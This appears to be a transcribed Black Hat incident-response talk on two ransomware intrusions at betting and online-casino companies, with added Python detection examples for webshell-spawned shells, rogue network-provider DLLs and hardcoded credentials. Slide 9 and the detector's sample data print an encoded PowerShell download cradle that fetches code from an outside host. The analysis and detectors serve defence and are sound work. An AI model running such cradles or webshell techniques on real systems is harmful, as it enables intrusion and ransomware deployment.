This deck premiered at Black Hat in Las Vegas in August.
He explains two cases from the world of online gaming, in particular betting and online casinos.
These companies show two faces: on the one hand great competence and attention to the quality of the code and the security of their portals, but on the other they do not seem to apply the same level of controls where their own staff is concerned. As always the devil is in the details, and the ransomware gangs know it well.
2. Who I Am: Stefano
• I am the Practice Manager of the Netwitness (RSA) Incident Response.
• I began my ICT career in 1997 in Digital Corp, but I started to crack software in 1985 with a Commodore C64.
• I decided to get out of the cracking scene in 2000 to focus on networking… until Nimda and Blaster came out and cybersecurity became an interesting career…
• I worked on the offensive side until 2009, when I jumped on the IR bandwagon.
• Since then, I have led engagements around the world covering investigations of sophisticated actors.
3. Agenda
❑ Introduction
❑ The first case
  ❑ Initial Compromise
  ❑ Second Phase, Second Actor
  ❑ Third Phase
  ❑ Ransomware in play
  ❑ The outcome
❑ The second case
  ❑ Exotic Lily + Conti…
❑ Enablers of compromise
❑ Lessons learned
5. Initial Compromise
▪ Through an active exploit of the Exchange web server, two webshells (Logout.aspx and iisstart.aspx) were uploaded to DC1-EXCH01 on December 9, 2021.
[Diagram: attacker at 23.183.81.113 dropping Logout.aspx and iisstart.aspx on DC1-EXCH01 in the MUNICH Data Center, next to DC1-EXCH00. Callout: the Exchange server version was 2019 CU10.]
6. Evidence of Initial Attack
▪ The proximity of the file creation times (a few milliseconds apart) in different paths confirms that the webshells were dropped through an exploit with chained payloads.
▪ Web log retention on the server was 30 days, so the logs had rolled over before the investigation started, but the webshells were likely uploaded via the exploit of CVE-2021-42321, an RCE, based on the folders used to drop them.
[Screenshot of the file listings: first webshell, a basic loader; second webshell, with functions to interact with files; timestomped dates.]
7. CVE-2021-42321 in action
▪ The remote code execution vulnerability is due to issues with the validation of command-let (cmdlet) arguments.
▪ In order to exploit this flaw, an attacker would need to be authenticated.
The attack requires the execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful.
8. We never leaked credentials…
▪ The attacker authenticated by leveraging leaked credentials of a subcontractor working as a developer in the environment.
"Yeah, that account is mine, but it is a personal account… what is the meaning of this?... And how did you collect it???"
9. Logout.aspx Webshell
▪ This webshell is extremely simple: it makes the IIS worker process (w3wp.exe) spawn the Command Processor (cmd.exe), which, in turn, launches PowerShell (powershell.exe or pwsh.exe).
"cmd.exe" /c powershell -ep bypass -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=
Decoded: IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e')
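As an added example (not code from the deck), the Python triage logic below shows what a detection for this slide looks like: it takes process-creation events (parent image, child image, command line, as exported from Sysmon Event ID 1 or Windows 4688), flags an IIS worker process spawning a shell, decodes the -e / -EncodedCommand argument (PowerShell expects base64 of UTF-16LE; the slide shows a plain-ASCII variant, so both are tried) and checks the decoded text for a download cradle. The event list is constructed; only the first command line is the one from the slide.

```python
import base64
import re

# Constructed sample events (parent image, child image, command line). The first
# command line is the one shown on the slide; the others are made up for contrast.
SAMPLE_EVENTS = [
    ("w3wp.exe", "cmd.exe",
     '"cmd.exe" /c powershell -ep bypass -e '
     "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3"
     "RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk="),
    ("w3wp.exe", "powershell.exe",
     "powershell.exe -NoP -EncodedCommand " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/x')"
         .encode("utf-16le")).decode()),
    ("explorer.exe", "powershell.exe", 'powershell -File "C:\\scripts\\backup.ps1"'),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

IIS_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Accepted spellings of -EncodedCommand (PowerShell allows -e, -ec, -enc as well).
ENCODED_SWITCHES = ("e", "ec", "enc", "encodedcommand")
CRADLE = re.compile(r"\b(IEX|Invoke-Expression)\b.*\b(downloadstring|downloadfile|"
                    r"invoke-webrequest|iwr|invoke-restmethod)\b", re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted strings whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def decode_encoded_command(blob):
    """Decode a -EncodedCommand argument; None if it is not base64 of printable ASCII
    in either UTF-16LE (what PowerShell expects) or plain ASCII (as on the slide)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for enc in ("utf-16le", "ascii"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(c in "\r\n\t" or 32 <= ord(c) < 127 for c in text):
            return text
    return None


def extract_encoded_command(cmdline):
    """Find the encoded-command switch and return its decoded argument, if any."""
    tokens = tokenize(cmdline)
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and tok.lstrip("-/").lower() in ENCODED_SWITCHES:
            return decode_encoded_command(tokens[i + 1])
    return None


def classify_event(parent, child, cmdline):
    """Return the decoded payload (if any) and the list of findings for one event."""
    decoded = extract_encoded_command(cmdline)
    findings = []
    if parent.lower() in IIS_WORKERS and child.lower() in SHELLS:
        findings.append("iis_worker_spawned_shell")
    if re.search(r"(?i)-(ep|ex|exec|executionpolicy)\s+bypass", cmdline):
        findings.append("execution_policy_bypass")
    if decoded is not None:
        findings.append("encoded_command")
        if CRADLE.search(decoded):
            findings.append("download_cradle")
    return {"decoded": decoded, "findings": findings}


def triage(events):
    """Map each suspicious command line to its findings; benign events are dropped."""
    results = {}
    for parent, child, cmdline in events:
        verdict = classify_event(parent, child, cmdline)
        if verdict["findings"]:
            results[cmdline] = verdict
    return results
```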
10. Webshell Logic of iisstart.aspx
▪ The second webshell allows the attacker to interact with the system through requests containing the parameter cadataKey.
▪ If the cadataKey parameter is not specified, the webshell redirects to the errorFE.aspx page, returning an HTTP 404 code.
▪ The webshell included the ability to run arbitrary commands and to upload, delete, and view the contents of files.
▪ Once implanted, the webshell allowed the attacker to access the environment with local administration rights.
All commands specified through this parameter are executed through an eval statement.
12. Second Phase, Second Actor
▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to DC1-EXCH00 and, a few minutes later, to DC1-EXCH01.
▪ This malicious file is loaded into processes and harvests cleartext passwords in real time as various users authenticate with the Exchange server.
[Diagram: attacker at 23.183.81.113; DC1-EXCH00 and DC1-EXCH01 (iisstart.aspx, lsass.dll) in the MUNICH Data Center.]
This long pause between the initial webshells and the subsequent activity could be due to the initial attacker selling access to the ransomware attacker.
13. Second Phase, Second Actor
▪ The harvested credentials are saved, as User/Pass pairs, into a file named C:\windows\temp\tmpQWER.tmp.
▪ Hundreds of cleartext passwords were harvested.
▪ This file was subsequently uploaded to several other servers, including several domain controllers.
[Diagram: DC1-EXCH00 and DC1-EXCH01 (iisstart.aspx, lsass.dll) in the MUNICH Data Center, each writing User/Pass pairs to C:\windows\temp\tmpQWER.tmp.]
The DLL uses the NPLogonNotify API provided by Microsoft to extract cleartext credentials of users as they log into the servers.
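A DLL only receives NPLogonNotify callbacks once it is registered as a network provider, i.e. listed in the ProviderOrder value under HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order and given a ProviderPath under Services\<name>\NetworkProvider, so that registration is where a defender can hunt for a harvester like the one on this slide. The Python audit below is an added example (not from the deck): it parses `reg query`-style output and flags providers that are not built in, that point a built-in name at a different DLL, or that load from outside System32. The sample output, the built-in baseline (LanmanWorkstation, RDPNP, webclient) and the rogue "lsass" entry are assumptions of the example.

```python
import re
from collections import OrderedDict

# Constructed `reg query <key> /s` style output (not from the case). A provider
# named "lsass" has been appended to ProviderOrder and points at a DLL dropped in
# C:\Windows\Temp, mirroring the technique described on the slide.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order
    ProviderOrder    REG_SZ    RDPNP,LanmanWorkstation,webclient,lsass

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDPNP\NetworkProvider
    Name    REG_SZ    Microsoft Remote Desktop Session Host Server Network Provider
    ProviderPath    REG_EXPAND_SZ    %SystemRoot%\System32\drprov.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider
    Name    REG_SZ    Microsoft Windows Network
    ProviderPath    REG_EXPAND_SZ    %SystemRoot%\System32\ntlanman.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\webclient\NetworkProvider
    Name    REG_SZ    Web Client Network
    ProviderPath    REG_EXPAND_SZ    %SystemRoot%\System32\davclnt.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lsass\NetworkProvider
    Name    REG_SZ    Windows Security Helper
    ProviderPath    REG_EXPAND_SZ    C:\Windows\Temp\lsass.dll
"""

# Providers that ship with Windows, keyed by the service name used in
# ProviderOrder, with the DLL each one is expected to load.
BASELINE = {
    "lanmanworkstation": "ntlanman.dll",
    "rdpnp": "drprov.dll",
    "webclient": "davclnt.dll",
}
ORDER_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order"
SYSTEM32 = ("%systemroot%\\system32\\", "c:\\windows\\system32\\")


def parse_reg_query(text):
    """Turn `reg query` output into {key: {value_name: data}} (value types dropped)."""
    keys, current = OrderedDict(), None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif line.startswith(" ") and current is not None:
            parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
            if len(parts) == 3:
                keys[current][parts[0]] = parts[2]
    return keys


def audit_network_providers(text):
    """Return (provider, reason) findings for every entry in ProviderOrder."""
    keys = parse_reg_query(text)
    order = keys.get(ORDER_KEY, {}).get("ProviderOrder", "")
    findings = []
    for provider in filter(None, order.split(",")):
        sub = ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s\\NetworkProvider"
               % provider)
        path = keys.get(sub, {}).get("ProviderPath")
        if path is None:
            findings.append((provider, "listed in ProviderOrder but has no NetworkProvider key"))
            continue
        lowered = path.lower()
        expected = BASELINE.get(provider.lower())
        if expected is None:
            findings.append((provider, "not a built-in provider: %s" % path))
        elif not lowered.endswith("\\" + expected):
            findings.append((provider, "built-in provider redirected to %s" % path))
        if not lowered.startswith(SYSTEM32):
            findings.append((provider, "DLL loaded from outside System32: %s" % path))
    return findings
```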
14. Second Phase, Second Actor
▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a remote desktop software) on DC1-EXCH00 on 18 February 2022.
[Diagram: attacker at 23.183.81.113; DC1-EXCH00 (iisstart.aspx, atera.exe, lsass.dll) and DC1-EXCH01 (iisstart.aspx) in the MUNICH Data Center.]
Atera is an IT management solution that enables monitoring, management, and automation of IT networks from a single console.
15. How to Avoid Generic Detection: Atera
▪ The idea behind this tactic is to leverage legitimate remote management agents (like Atera) to survive possible Cobalt Strike detections from the EDR and antivirus platforms.
▪ Relying upon a legitimate tool to achieve persistence is typically a pen tester approach and, in my personal perspective, this can clarify the attacker's background.
16. How to Complete the Job…
▪ The attacker then resumed activity on 11 March 2022.
[Diagram: attacker at 23.183.81.113; DC1-EXCH00 (webshell, lsass.dll) and DC1-DC0001 (atera.exe, lsass.dll) in the MUNICH Data Center.]
The Atera package was uploaded on the Domain Controller of the targeted Data Center (DC1-DC0001) together with the credential dumper "lsass.dll".
17. How to Complete the Job…
▪ On March 23, the attacker uploaded lsass.dll to DC1-EXCH01:
[Diagram: attacker at 23.183.81.113; DC1-EXCH00 and DC1-EXCH01 (iisstart.aspx, lsass.dll) in the MUNICH Data Center.]
He immediately started the credential harvesting on this system.
18. Third Phase: 23 March – 5 April
▪ During this period the attacker moved laterally to various systems, including Domain Controllers, backup servers, etc.
▪ Scanning and reconnaissance on the network were executed regularly.
[Diagram: DC1-DC0001 (lsass.dll) and DC1-EXCH00 (lsass.dll, iisstart.aspx, atera.exe) in the MUNICH Data Center scanning workstations, dev systems and the virtual infrastructure across the MUNICH Data Center and the MUNICH Office.]
During these scans the attacker identified the virtual infrastructure where critical servers were operating.
20. Status
▪ Ok, we reached this point… it's April 6, the attacker owns the place and in less than 24 hours he collected about 12,45 Gb of data from the environment, including lots of payment and betting details.
▪ Unfortunately, up to this point, the attacker was able to work undetected. Why?
▪ To answer we should clarify the meaning and the role of an "Enabler of Compromise," but let's first see how the attack unfolded...
22. Ransomware in Play…
6 April 2022: the attacker executed a massive dissemination of the ransomware executable with a combination of RDP and PsExec sessions.
[Diagram: ransomware distribution via RDP + PsExec from DC1-DC0001 (lsass.dll, atera.exe) to workstations, dev systems and the virtual infrastructure across the MUNICH Data Center, MUNICH Office, TORONTO Data Center and MACAU Data Center.]
23. Ransomware in Play…
▪ With a separate and tailored action, the attacker ensured the backup servers of the company were encrypted, by leveraging another variant of the ransomware.
▪ This variant was also used against the company's ESXi servers (about 50 hosts), which adversely affected around 2000 virtual machines hosted on them.
▪ The ransomware file that the attacker deployed to the ESXi servers was named "32app".
▪ The version affecting all the other hosts was named "bet9je_com_alpha_encrypt_app.exe".
24. Virtual Server Encryption
▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them.
[Diagram: DC1-DC0001 (atera.exe) in the MUNICH Data Center; ransomware distributed to the virtual infrastructure via SSH sessions and installed manually on the backup infrastructure.]
25. What we found: Network Forensics
▪ During the attack, the actor kept three systems untouched, in particular the Exchange server.
[Diagram: the three untouched systems, DC1-EXCH00 (atera.exe), DC1-EXCH10 and DC3-SPORS2, across the MUNICH and TORONTO Data Centers.]
▪ This is probably due to the goal of keeping an eye upon the target.
▪ In fact, the victim's email system was still working despite the encryption of the remaining systems…
26. The Outcome
▪ It took 45 days to get rid of the whole infection, but it took five days to recover basic services, allowing the company to slowly get back to business.
▪ From the end-users' perspective the attack was a significant blow to the company's reputation and, at least initially, it impacted the overall relationship with the company's customer base.
▪ However, the gaming world has its own rules and 45 days later it was like business as usual in the company headquarters… apart from some minor, but meaningful, details:
  ▪ Enhanced network visibility
  ▪ New staff for daily monitoring of network and infrastructures…
  ▪ No Splashtop, TeamViewer or AnyDesk connections
  ▪ No scripts with hardcoded credentials
  ▪ New cybersecurity procedures
28. The second case: introduction
▪ This case targeted a group operating in the online casino sector with about 2.500 employees.
▪ The company has two data centers, located in Australia and Hong Kong, and operates mainly in the Asia-Pacific market.
▪ The cybersecurity practice inside the company at the time was mainly managed by one global MSSP and one local provider.
▪ Again, privacy is a mandatory requirement for an online casino and the company was applying strong controls upon online services and data privacy.
▪ However, they left open several holes in their cybersecurity ecosystem… lots of enablers of compromise:
  ▪ Total lack of network visibility, both internally and in the company private cloud
  ▪ Lack of organized logs and limited endpoint visibility
  ▪ Lack of any behavior analysis at user level for internal staff
  ▪ Limited investigative and reactive capabilities
  ▪ Real-time threat detection limited to "low hanging fruits"
  ▪ Lack of a proper escalation plan for ICT incidents
29. Attack Preparation
▪ The attack was organized around a flow very similar to the first case presented, with the difference that the attacker this time targeted the staff with domain spoofing and spear-phishing.
[Flow diagram, attacker to victim through an online file-sharing service: register "company.us" to spoof "company.co.au"; create the employee@company.us email account; acquire the target's email through OSINT and send a phishing email; send a sounding email discussing business and meetings; upload the payload to the file-sharing service, sharing it with the target; send a file-sharing notification.]
30. Initial Compromise
▪ The attacker sent an email mimicking a contractor and asking for feedback on a service architecture.
▪ The email asked to set a time for a call the following week about the content of the email.
[Diagram: attacker at 44.227.65.245 sending the email toward the MUNICH Data Center.]
31. Exotic Lily + Conti in Action
[Diagram of the attack chain: Domain Spoofing; Spear-Phishing Campaign; BazarLoader; Initial Compromise and Recon; Cobalt Strike (write, execute); Exotic Lily: download additional tools, perform command-line recon, harvest local and network credentials; Lateral Movement: PowerShell, RDP (Splashtop, AnyDesk), stolen VPN and admin credentials; CONTI: RDP toward DCs, Atera package, application servers; Exotic Lily C2, leaks, SSL sessions to C2.]
32. No Doubt on Attribution…
It was absolutely easy to attribute the attack to the Conti ransomware gang: their banner spoke for itself.
34. Enablers of Compromise
▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider expansion of the radius and the magnitude of the attack.
▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc… These protocols, if exploited, could grant significant advantages to the attacker.
▪ Other traditional enablers are shared local administrative accounts, guessable credentials, unpatched public web servers or unauthenticated network shares.
▪ Nowadays, during targeted attacks, the attacker could use a myriad of tools and techniques to breach an organization's network, steal sensitive information and compromise its operations.
▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers of successful cyber attacks.
An enabler of compromise is a pre-existing condition to the attack.
35. Script with Hardcoded Credentials
We found the cron script /root/inventory_queries.sh on a critical repository containing hardcoded login credentials, as illustrated here:
Also, we found cron jobs running under the root user that used a service account, including the password, in cleartext.
36. Enablers of compromise or careless users???
Unreported TeamViewer and AnyDesk usage
During the analysis we found several systems connected to the company network with TeamViewer and AnyDesk remote control software installed.
The presence of remote control software on systems connected to the network may provide additional access points that bypass existing security measures.
Cracked software
During the analysis we found evidence of systems using cracked Windows licenses.
PowerShell scripts with cleartext credentials
Reviewing the network, we found several PowerShell scripts containing cleartext credentials.
Root password in root's .bash_history
Reviewing the logs regarding the usage of Unix systems we stumbled upon another significant enabler of compromise…
You can notice here…
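As an added example (not from the deck), the Python scanner below covers the three credential enablers named on slides 35 and 36: passwords hardcoded in cron/shell scripts, PowerShell scripts that build a credential from plaintext, and secrets typed into root's .bash_history. The file contents, hosts and passwords are constructed for the example, and every matched secret is redacted in the report so the findings can be circulated without re-exposing it.

```python
import re

# Constructed sample files standing in for the artefacts named on the slides
# (a root cron script, a PowerShell script, root's .bash_history). Contents,
# hostnames and passwords are invented for this example.
SAMPLE_FILES = {
    "/root/inventory_queries.sh": (
        "#!/bin/bash\n"
        "# nightly inventory export, runs from root's crontab\n"
        "mysql -h db01.internal -u inventory -pInv3ntory!2022 warehouse"
        " -e 'SELECT * FROM stock' > /tmp/inv.csv\n"
        "curl -u svc_upload:Upl0ad#Key https://share.internal/api/put -T /tmp/inv.csv\n"
    ),
    "C:\\scripts\\sync_ad.ps1": (
        "$pw = ConvertTo-SecureString 'Sync-Pa55word' -AsPlainText -Force\n"
        "$cred = New-Object System.Management.Automation.PSCredential('CORP\\svc_sync', $pw)\n"
        "Get-ADUser -Filter * -Credential $cred | Export-Csv users.csv\n"
    ),
    "/root/.bash_history": (
        "cd /opt/backup\n"
        "sshpass -p 'R00t-Backup!' scp dump.tgz backup01:/srv/dumps/\n"
        "echo 'NewR00tPass' | passwd --stdin root\n"
        "ls -la\n"
    ),
}

# Each rule captures the secret in a group named "secret"; the first match wins.
RULES = [
    ("password piped into passwd",
     re.compile(r"\becho\s+['\"]?(?P<secret>[^'\"|\s]+)['\"]?\s*\|\s*(?:sudo\s+)?passwd\b")),
    ("password on the command line (-p)",
     re.compile(r"\b(?:mysql|mysqldump|psql|sshpass)\b.*?\s-p\s?['\"]?(?P<secret>[^\s'\"]+)")),
    ("basic-auth credentials passed to curl",
     re.compile(r"\bcurl\b.*?\s(?:-u|--user)\s+[^\s:]+:(?P<secret>\S+)")),
    ("PowerShell SecureString built from plaintext",
     re.compile(r"ConvertTo-SecureString\s+['\"](?P<secret>[^'\"]+)['\"].*-AsPlainText")),
    ("password assigned in cleartext",
     re.compile(r"(?i)\b(?:password|passwd|pwd|secret)\b\s*[=:]\s*['\"]?(?P<secret>[^'\"\s]+)")),
]


def redact(line, match):
    """Replace the captured secret with a length-preserving marker."""
    start, end = match.span("secret")
    return line[:start] + "<redacted:%d chars>" % (end - start) + line[end:]


def scan_text(path, text):
    """One hit per matching line: path, 1-based line number, rule and redacted line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            match = pattern.search(line)
            if match:
                hits.append({"path": path, "line": number, "rule": rule,
                             "evidence": redact(line, match)})
                break
    return hits


def scan_files(files):
    """Scan a {path: contents} mapping (e.g. read from disk) and collect all hits."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_text(path, text))
    return hits
```

Every hit is a credential to rotate, not just a line to delete: the value has already lived in cleartext on a host the attacker may have read.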
38. It's all about visibility… and a clean environment…
▪ The sophisticated nature of today's threat landscape and actors continues to wreak havoc on enterprise infrastructures; to our surprise, this occurs upon betting and online casino services more than expected.
▪ Visibility is the key to protecting a network, by actively looking for any security gap, vulnerability, on-going cyber attack, and any anomaly or wrong usage of network resources.
▪ The rule is "If you don't find them, you can't fix them".
▪ Unfortunately, visibility is a major issue in the gaming industry.
▪ There could be several reasons why this is the case: the gaming industry may not understand the importance of network visibility, for example, or may lack the tools and resources to get started.
▪ In any case, the lack of adequate response from security teams is due to the dependency on perimeter-based security solutions that are not agile enough to deal with sophisticated threats, or to the limited spectrum of cybersecurity controls these companies enforce nowadays.
39. Visibility, Flexibility and Practice
[Diagram: Comprehensive Visibility; Preparedness (Incident Response Retainer, Major Incident Practice Drills, Cyber Insurance, Recovery Planning); Proactive Detection and Response; Reactive Capabilities.]